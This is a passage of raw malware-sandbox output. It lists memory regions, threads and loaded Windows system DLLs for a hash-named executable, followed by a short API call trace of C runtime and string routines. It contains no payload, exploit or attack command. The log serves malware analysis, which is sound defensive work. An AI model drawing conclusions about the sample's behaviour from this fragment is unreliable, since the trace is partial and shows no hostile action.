start_va = 0x7900000
end_va = 0x79fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007900000"
filename = ""
Region:
id = 1267
start_va = 0x7a00000
end_va = 0x7afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007a00000"
filename = ""
Region:
id = 1268
start_va = 0x7b00000
end_va = 0x7bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007b00000"
filename = ""
Region:
id = 1269
start_va = 0xd40000
end_va = 0xdbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d40000"
filename = ""
Region:
id = 1270
start_va = 0x4e80000
end_va = 0x4efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e80000"
filename = ""
Region:
id = 1271
start_va = 0x7ffa0e7d0000
end_va = 0x7ffa0e849fff
monitored = 0
entry_point = 0x7ffa0e7f7630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1272
start_va = 0x470000
end_va = 0x471fff
monitored = 0
entry_point = 0x475630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1273
start_va = 0x8d0000
end_va = 0x8d4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 1274
start_va = 0x7ffa10bc0000
end_va = 0x7ffa10c10fff
monitored = 0
entry_point = 0x7ffa10bc25e0
region_type = mapped_file
name = "cscobj.dll"
filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")
Thread:
id = 18
os_tid = 0xb58
Thread:
id = 19
os_tid = 0x11e4
Thread:
id = 20
os_tid = 0xcdc
Thread:
id = 21
os_tid = 0xfa4
Thread:
id = 22
os_tid = 0xd58
Thread:
id = 23
os_tid = 0xcf0
Thread:
id = 24
os_tid = 0x27c
Thread:
id = 25
os_tid = 0xa84
Thread:
id = 26
os_tid = 0xa78
Thread:
id = 27
os_tid = 0x9f8
Thread:
id = 28
os_tid = 0x93c
Thread:
id = 29
os_tid = 0x984
Thread:
id = 30
os_tid = 0xa80
Thread:
id = 31
os_tid = 0xb00
Thread:
id = 32
os_tid = 0x61c
Thread:
id = 33
os_tid = 0x9dc
Thread:
id = 34
os_tid = 0x9d8
Thread:
id = 35
os_tid = 0xb10
Thread:
id = 36
os_tid = 0x40c
Thread:
id = 37
os_tid = 0x534
Thread:
id = 38
os_tid = 0x668
Thread:
id = 39
os_tid = 0x388
Thread:
id = 40
os_tid = 0xa6c
Thread:
id = 41
os_tid = 0x828
Thread:
id = 42
os_tid = 0x8c
Thread:
id = 43
os_tid = 0x398
Thread:
id = 44
os_tid = 0x380
Thread:
id = 45
os_tid = 0x29c
Thread:
id = 46
os_tid = 0x234
Thread:
id = 47
os_tid = 0x230
Thread:
id = 48
os_tid = 0xb6c
Thread:
id = 49
os_tid = 0x82c
Thread:
id = 50
os_tid = 0x878
Thread:
id = 51
os_tid = 0x958
Thread:
id = 52
os_tid = 0x830
Thread:
id = 53
os_tid = 0xa1c
Thread:
id = 54
os_tid = 0x9e8
Thread:
id = 55
os_tid = 0x9e0
Thread:
id = 56
os_tid = 0x950
Thread:
id = 57
os_tid = 0xaa4
Thread:
id = 58
os_tid = 0xbb8
Thread:
id = 59
os_tid = 0xbb4
Thread:
id = 60
os_tid = 0x8c4
Thread:
id = 61
os_tid = 0xbf8
Thread:
id = 62
os_tid = 0x5ec
Thread:
id = 63
os_tid = 0x780
Thread:
id = 64
os_tid = 0x728
Thread:
id = 65
os_tid = 0x4f8
Thread:
id = 66
os_tid = 0x7e4
Thread:
id = 67
os_tid = 0x7e0
Thread:
id = 68
os_tid = 0x7dc
Thread:
id = 69
os_tid = 0x7d8
Thread:
id = 70
os_tid = 0x7c4
Thread:
id = 71
os_tid = 0x7b0
Thread:
id = 72
os_tid = 0x788
Thread:
id = 73
os_tid = 0x744
Thread:
id = 74
os_tid = 0x448
Thread:
id = 75
os_tid = 0x6f8
Thread:
id = 76
os_tid = 0x6d4
Thread:
id = 77
os_tid = 0x640
Thread:
id = 78
os_tid = 0x530
Thread:
id = 79
os_tid = 0x4a8
Thread:
id = 80
os_tid = 0x2ac
Thread:
id = 81
os_tid = 0x270
Thread:
id = 82
os_tid = 0x154
Thread:
id = 83
os_tid = 0x1b8
Thread:
id = 84
os_tid = 0x1bc
Thread:
id = 85
os_tid = 0x180
Thread:
id = 86
os_tid = 0x188
Thread:
id = 87
os_tid = 0x148
Thread:
id = 88
os_tid = 0x12c
Thread:
id = 89
os_tid = 0xfc
Thread:
id = 90
os_tid = 0x60
Thread:
id = 91
os_tid = 0x3f0
Thread:
id = 92
os_tid = 0x3e8
Thread:
id = 93
os_tid = 0x3cc
Thread:
id = 94
os_tid = 0x364
Thread:
id = 103
os_tid = 0x10ac
Thread:
id = 107
os_tid = 0xd1c
Thread:
id = 108
os_tid = 0xd40
Thread:
id = 109
os_tid = 0x288
Thread:
id = 110
os_tid = 0xf6c
Thread:
id = 111
os_tid = 0xe44
Process:
id = "5"
image_name = "42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
filename = "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
page_root = "0x48377000"
os_pid = "0x1074"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x1390"
cmd_line = "\"{path}\""
cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
os_username = "XC64ZB\\RDhJ0CNFevzX"
bitness = "32"
os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1161
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1162
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1163
start_va = 0x40000
end_va = 0x54fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1164
start_va = 0x60000
end_va = 0x9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 1165
start_va = 0xa0000
end_va = 0x19ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1166
start_va = 0x1a0000
end_va = 0x1a3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 1167
start_va = 0x1b0000
end_va = 0x1b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 1168
start_va = 0x1c0000
end_va = 0x1c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1169
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1170
start_va = 0x400000
end_va = 0x4affff
monitored = 1
entry_point = 0x477a92
region_type = mapped_file
name = "42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\42638e51cd3eff415ce751e700d233596988fd51ffba584b18dd2e78ec07bc2b.exe")
Region:
id = 1171
start_va = 0x771d0000
end_va = 0x7734afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1172
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1173
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1174
start_va = 0x7fff0000
end_va = 0x7ffa1676ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1175
start_va = 0x7ffa16770000
end_va = 0x7ffa16930fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1176
start_va = 0x7ffa16931000
end_va = 0x7ffffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00007ffa16931000"
filename = ""
Region:
id = 1177
start_va = 0x400000
end_va = 0x416fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1178
start_va = 0x420000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1179
start_va = 0x640d0000
end_va = 0x6411ffff
monitored = 0
entry_point = 0x640e8180
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1180
start_va = 0x64050000
end_va = 0x640c9fff
monitored = 0
entry_point = 0x64063290
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1181
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1182
start_va = 0x64120000
end_va = 0x64127fff
monitored = 0
entry_point = 0x641217c0
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1183
start_va = 0x4d0000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 1184
start_va = 0x76720000
end_va = 0x767fffff
monitored = 0
entry_point = 0x76733980
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1185
start_va = 0x76910000
end_va = 0x76a8dfff
monitored = 0
entry_point = 0x769c1b90
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1192
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1193
start_va = 0x7feb0000
end_va = 0x7ffaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007feb0000"
filename = ""
Region:
id = 1194
start_va = 0x630000
end_va = 0x6edfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1195
start_va = 0x743d0000
end_va = 0x74516fff
monitored = 0
entry_point = 0x743e1cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1196
start_va = 0x74ab0000
end_va = 0x74bfefff
monitored = 0
entry_point = 0x74b66820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1197
start_va = 0x420000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1198
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 1199
start_va = 0x6f0000
end_va = 0x7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1200
start_va = 0x20000
end_va = 0x23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 1201
start_va = 0x76600000
end_va = 0x7667afff
monitored = 0
entry_point = 0x7661e970
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1202
start_va = 0x76a90000
end_va = 0x76b4dfff
monitored = 0
entry_point = 0x76ac5630
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1203
start_va = 0x76cb0000
end_va = 0x76cf3fff
monitored = 0
entry_point = 0x76cc9d80
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1204
start_va = 0x76c00000
end_va = 0x76cacfff
monitored = 0
entry_point = 0x76c14f00
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1205
start_va = 0x73f00000
end_va = 0x73f1dfff
monitored = 0
entry_point = 0x73f0b640
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1206
start_va = 0x73ef0000
end_va = 0x73ef9fff
monitored = 0
entry_point = 0x73ef2a00
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1207
start_va = 0x76840000
end_va = 0x76897fff
monitored = 0
entry_point = 0x768825c0
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")
Region:
id = 1208
start_va = 0x74eb0000
end_va = 0x762aefff
monitored = 0
entry_point = 0x7506b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1209
start_va = 0x76800000
end_va = 0x76836fff
monitored = 0
entry_point = 0x76803b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1210
start_va = 0x745b0000
end_va = 0x74aa8fff
monitored = 0
entry_point = 0x747b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 1211
start_va = 0x762b0000
end_va = 0x7646cfff
monitored = 0
entry_point = 0x76392a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1212
start_va = 0x76d00000
end_va = 0x76d44fff
monitored = 0
entry_point = 0x76d1de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1213
start_va = 0x76d50000
end_va = 0x76d5bfff
monitored = 0
entry_point = 0x76d53930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1214
start_va = 0x74520000
end_va = 0x745acfff
monitored = 0
entry_point = 0x74569b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 1215
start_va = 0x76470000
end_va = 0x764b3fff
monitored = 0
entry_point = 0x76477410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1216
start_va = 0x73f20000
end_va = 0x73f2efff
monitored = 0
entry_point = 0x73f22e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1217
start_va = 0x73f30000
end_va = 0x73f8efff
monitored = 0
entry_point = 0x73f34af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 1218
start_va = 0x6bab0000
end_va = 0x6bb1ffff
monitored = 0
entry_point = 0x6bae2cf0
region_type = mapped_file
name = "msvcp60.dll"
filename = "\\Windows\\SysWOW64\\msvcp60.dll" (normalized: "c:\\windows\\syswow64\\msvcp60.dll")
Region:
id = 1219
start_va = 0x460000
end_va = 0x49ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000460000"
filename = ""
Region:
id = 1220
start_va = 0x7f0000
end_va = 0x8effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 1221
start_va = 0x6ba80000
end_va = 0x6baa3fff
monitored = 0
entry_point = 0x6ba84820
region_type = mapped_file
name = "winmm.dll"
filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll")
Region:
id = 1222
start_va = 0x717a0000
end_va = 0x7191dfff
monitored = 0
entry_point = 0x7181c630
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll")
Region:
id = 1223
start_va = 0x6c3e0000
end_va = 0x6c54afff
monitored = 0
entry_point = 0x6c44e360
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll")
Region:
id = 1224
start_va = 0x71590000
end_va = 0x7179cfff
monitored = 0
entry_point = 0x7167acb0
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")
Region:
id = 1225
start_va = 0x73b80000
end_va = 0x73e4afff
monitored = 0
entry_point = 0x73dbc4c0
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll")
Region:
id = 1226
start_va = 0x6ba50000
end_va = 0x6ba72fff
monitored = 0
entry_point = 0x6ba58940
region_type = mapped_file
name = "winmmbase.dll"
filename = "\\Windows\\SysWOW64\\winmmbase.dll" (normalized: "c:\\windows\\syswow64\\winmmbase.dll")
Region:
id = 1227
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1228
start_va = 0x8f0000
end_va = 0xa77fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000008f0000"
filename = ""
Region:
id = 1229
start_va = 0x741b0000
end_va = 0x741dafff
monitored = 0
entry_point = 0x741b5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1230
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1231
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1232
start_va = 0xa80000
end_va = 0xc00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a80000"
filename = ""
Region:
id = 1233
start_va = 0xc10000
end_va = 0x200ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c10000"
filename = ""
Region:
id = 1234
start_va = 0x2010000
end_va = 0x220ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002010000"
filename = ""
Region:
id = 1235
start_va = 0x1e0000
end_va = 0x1e3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1236
start_va = 0x764d0000
end_va = 0x764d5fff
monitored = 0
entry_point = 0x764d1460
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1237
start_va = 0x4d0000
end_va = 0x50ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 1238
start_va = 0x530000
end_va = 0x62ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 1239
start_va = 0x2010000
end_va = 0x210ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002010000"
filename = ""
Region:
id = 1240
start_va = 0x2110000
end_va = 0x214ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002110000"
filename = ""
Region:
id = 1241
start_va = 0x2150000
end_va = 0x218ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 1242
start_va = 0x2200000
end_va = 0x220ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1243
start_va = 0x2210000
end_va = 0x230ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 1244
start_va = 0x2310000
end_va = 0x240ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002310000"
filename = ""
Region:
id = 1245
start_va = 0x71420000
end_va = 0x7146efff
monitored = 0
entry_point = 0x7142d850
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")
Region:
id = 1246
start_va = 0x6fa20000
end_va = 0x6fa31fff
monitored = 0
entry_point = 0x6fa22960
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\SysWOW64\\NapiNSP.dll" (normalized: "c:\\windows\\syswow64\\napinsp.dll")
Region:
id = 1247
start_va = 0x6fa00000
end_va = 0x6fa15fff
monitored = 0
entry_point = 0x6fa03130
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\SysWOW64\\pnrpnsp.dll" (normalized: "c:\\windows\\syswow64\\pnrpnsp.dll")
Region:
id = 1248
start_va = 0x6f9e0000
end_va = 0x6f9f3fff
monitored = 0
entry_point = 0x6f9e5a40
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll")
Region:
id = 1249
start_va = 0x70a50000
end_va = 0x70ad3fff
monitored = 0
entry_point = 0x70a76530
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")
Region:
id = 1254
start_va = 0x76900000
end_va = 0x76906fff
monitored = 0
entry_point = 0x76901e10
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 1255
start_va = 0x6f970000
end_va = 0x6f97afff
monitored = 0
entry_point = 0x6f971950
region_type = mapped_file
name = "winrnr.dll"
filename = "\\Windows\\SysWOW64\\winrnr.dll" (normalized: "c:\\windows\\syswow64\\winrnr.dll")
Region:
id = 1256
start_va = 0x6f980000
end_va = 0x6f9c6fff
monitored = 0
entry_point = 0x6f9958d0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")
Region:
id = 1257
start_va = 0x71560000
end_va = 0x7157afff
monitored = 0
entry_point = 0x71569050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 1258
start_va = 0x6f9d0000
end_va = 0x6f9d7fff
monitored = 0
entry_point = 0x6f9d1920
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")
Region:
id = 1261
start_va = 0x2510000
end_va = 0x254ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 1262
start_va = 0x2550000
end_va = 0x264ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002550000"
filename = ""
Thread:
id = 95
os_tid = 0x7c0
[0227.793] __set_app_type (_Type=0x2)
[0227.793] __p__fmode () returned 0x76b44d6c
[0227.793] __p__commode () returned 0x76b45b1c
[0227.793] __getmainargs (in: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c, _DoWildCard=0, _StartInfo=0x19ff14 | out: _Argc=0x19ff20, _Argv=0x19ff10, _Env=0x19ff1c) returned 0
[0227.796] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4151a8
[0227.796] _onexit (_Func=0x401326) returned 0x401326
[0227.796] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415180
[0227.796] _onexit (_Func=0x40135c) returned 0x40135c
[0227.797] ??2@YAPAXI@Z () returned 0x2202738
[0227.797] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x19fe9c
[0227.797] ??2@YAPAXI@Z () returned 0x2202780
[0227.797] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202780
[0227.797] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z () returned 0x2202790
[0227.797] ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ () returned 0x0
[0227.797] _onexit (_Func=0x4013bf) returned 0x4013bf
[0227.797] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x4151f0
[0227.797] _onexit (_Func=0x401c86) returned 0x401c86
[0227.800] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z () returned 0x415218
[0227.800] _onexit (_Func=0x401cb4) returned 0x401cb4
[0227.801] ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z () returned 0x19fe94
[0227.802] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0227.803] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x22027a9
[0227.803] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0227.803] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x22027aa
[0227.803] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0227.803] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x22027ab
[0227.803] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
[0227.803] ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z () returned 0x22027ac
[0227.803] ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ () returned 0x5
